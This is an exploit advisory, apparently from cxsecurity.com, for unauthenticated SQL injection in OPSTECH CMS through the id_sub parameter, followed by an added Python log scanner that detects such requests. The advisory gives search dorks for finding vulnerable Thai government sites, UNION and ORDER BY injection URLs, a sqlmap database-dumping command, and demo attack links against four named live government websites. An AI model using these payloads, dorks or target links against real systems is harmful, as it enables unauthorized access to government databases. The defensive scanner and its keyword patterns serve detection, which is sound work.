OPSTECH (Open Source Technology) CMS - MULTI SQL INJECTION

2018.11.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==========================================================
[+] Title :- OPSTECH (Open Source Technology) CMS - SQL INJECTION
[+] Date :- 6 - Nov - 2018
[+] Vendor Homepage :- http://www.opstech.co.th/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :-
inurl:id_sub= & site:go.th
intext:Copyright © 2008 by OPSTECH All Right Reserved. site:go.th
[+] Exploit Author :- mr.Gh0st N@0b
[+] Team name :- Myanmar Noob Hackers
[+] Greedz to :- All Myanmar Black Hats
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id_sub=
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL injection via multiple PHP files causing an SQL error
[+] SQL vulnerable File :- /home/***/domains/XXX.go.th/public_html/core_main/index.php
[+] POC :-
http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=[SQL]'

The SQL injection web vulnerability can be exploited by remote attackers without a privileged web-application user account or user interaction.

http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' order by [SQL INJECTION]--+
http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' union all select [SQL INJECTION]--+

[+] Sqlmap
sqlmap -u "http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221&id_type=1" -p id_sub --dbs --level=3

[+] DEMO :-
http://www.janvan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
http://www.watsuwan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
http://www.nongpluang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
http://kohkwang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
=======================================================
# mr.Gh0st N@0b [2018-11-6]
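A defender-side check for the parameter named above, added here as an example and not part of the original advisory: it scans web access logs for `id_sub` values that are not plain integers, which is what the legitimate URLs on this page carry. The nginx "combined" log format, the sample lines and the `suspicious_requests` helper are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [06/Nov/2018:10:00:01 +0700] "GET /index.php?mod=director_chart&path=director_chart&id_sub=221&id_type=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Nov/2018:10:00:05 +0700] "GET /index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Nov/2018:10:00:09 +0700] "GET /index.php?mod=director_chart&id_sub=221%27+UNION+ALL+SELECT+1--+ HTTP/1.1" 500 310 "-" "sqlmap/1.2"
203.0.113.4 - - [06/Nov/2018:10:01:00 +0700] "GET /index.php?mod=news&id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
WATCHED_PARAMS = {"id_sub"}          # vulnerable parameter named in the advisory
NUMERIC_RE = re.compile(r"[0-9]+")   # the only shape a legitimate id should have
# Secondary hint only: keywords and comment markers seen in the advisory's PoC.
SQL_HINT_RE = re.compile(r"(?i)\b(union|select|order\s+by)\b|--|/\*|'")


def suspicious_requests(log_text):
    """Return one finding per watched parameter whose decoded value is not an integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes and turns '+' into spaces, so encoded
        # payloads are compared in the form the application would see.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in WATCHED_PARAMS and not NUMERIC_RE.fullmatch(value):
                findings.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                    "sql_hint": bool(SQL_HINT_RE.search(value)),
                })
    return findings


if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f)
```

Access logs record only the query string, so requests that send `id_sub` in a POST body need the same check at the application or WAF layer.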



Copyright 2018, cxsecurity.com

 
